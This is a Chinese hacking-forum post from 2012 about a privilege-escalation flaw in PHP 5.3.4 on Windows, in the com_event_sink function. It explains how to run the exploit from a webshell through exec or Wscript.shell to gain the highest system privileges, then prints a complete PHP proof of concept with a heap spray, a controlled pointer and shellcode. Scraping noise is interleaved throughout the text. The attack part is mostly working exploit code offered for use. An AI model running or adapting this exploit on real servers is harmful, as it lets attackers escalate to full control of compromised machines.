中国网络渗透测试联盟
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-11-9 21:08
标题:
PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中
5 w5 o2 j/ @, M
' r8 v1 c& g& O; H5 r9 H
测试方法如下:cmd /c x:\php\php.exe x:\test.php
) A" |2 Y: f u) b5 T5 O
9 f% C( d8 \8 z/ ]" `
下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
/ V5 A7 H9 A% l4 N
这里是两个测试的截图:
* W* J1 I# a! c% [
' W0 g6 [1 U. C2 M! ]& u" B
. l; f. e$ V5 |' i* X6 z
1 g* X3 Y% D" A4 r- q
u. Z& E: g7 q! T# c6 P3 [
3 Z/ a& A2 B/ g( E* g
成功利用此漏洞的攻击者将获得系统的最高权限
+ C6 T) Q6 [: D1 u1 _- K, l6 H& l2 h4 f
5 S+ `7 ~$ a% Z: I- T) T" W+ o
/ ~% z/ F0 R/ G9 l* D3 R) @
" T; J* ]7 c$ y/ B1 M7 Z' e6 @
; H6 q/ g' Z6 G, ` e2 X
k/ Z6 @: ~ W
关于漏洞分析稍后附上。一下是PoC代码:
$ `2 O- b9 E; ?. b5 G
, t4 S; U) q' a( D: W! S' l
<?php
, I9 [& C: Q) m$ z% {- }
//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞
0 V' I9 l* J- @( v( S7 k: v
//$eip ="\x44\x43\x42\x41";
6 X% Q/ G F5 b/ E' v
$eip= "\x4b\xe8\x57\x78";
+ F1 W9 G6 }! N3 a h
$eax ="\x80\x01\x8d\x04";
1 k% Y$ C! @0 n
$deodrant="";
9 U( Z# L3 o* X: l7 m. x* ^
$axespray = str_repeat($eip.$eax,0x80);
; }7 w/ J* G5 t! L" L( @9 p/ K
//048d0190
4 F2 B( D* w* B7 x
echo strlen($axespray);
+ e! o9 Z- E2 n# r# B
echo "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";
9 ~! c" M: g$ \" U9 X0 E
echo "Silic Group Hacker Army - BlackBap.Org";
0 o1 i& L3 q" \
//19200 ==4B32 4b00
1 u$ m4 E/ U; v, Y/ f/ _" A0 t8 q
for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}
, N7 ]( F+ H, L2 y( c
$terminate = "T";
7 h( R8 e7 U0 Z7 i5 f+ q
$u[] =$deodrant;
# C H4 |2 U) I! u, X9 S; b X% D
$r[] =$deodrant.$terminate;
2 w/ b" e* a, R( B, E
$a[] =$deodrant.$terminate;
* b8 L" [3 {6 w" I2 D/ ]; z+ {
$s[] =$deodrant.$terminate;
8 p& S/ j9 @: V( n, O
//$vVar = new VARIANT(0x048d0038+$offset); 这里是可控可改的
! C; a: ~. h' w# c5 A" z
$vVar = new VARIANT(0x048d0000+180);
, ]) y' U8 d! D
//弹窗代码(Shellcode)
2 Z2 o4 i) N& `1 E# F1 U( X
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";
, _5 M0 r, S& [1 m8 N5 }
$var2 = new VARIANT(0x41414242);
( D5 x0 H- \. e* X+ r9 c
com_event_sink($vVar,$var2,$buffer);
: D) q: b' |% c4 z
?>
8 X C/ A. d" t
[attach]113[/attach][attach]114[/attach]
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2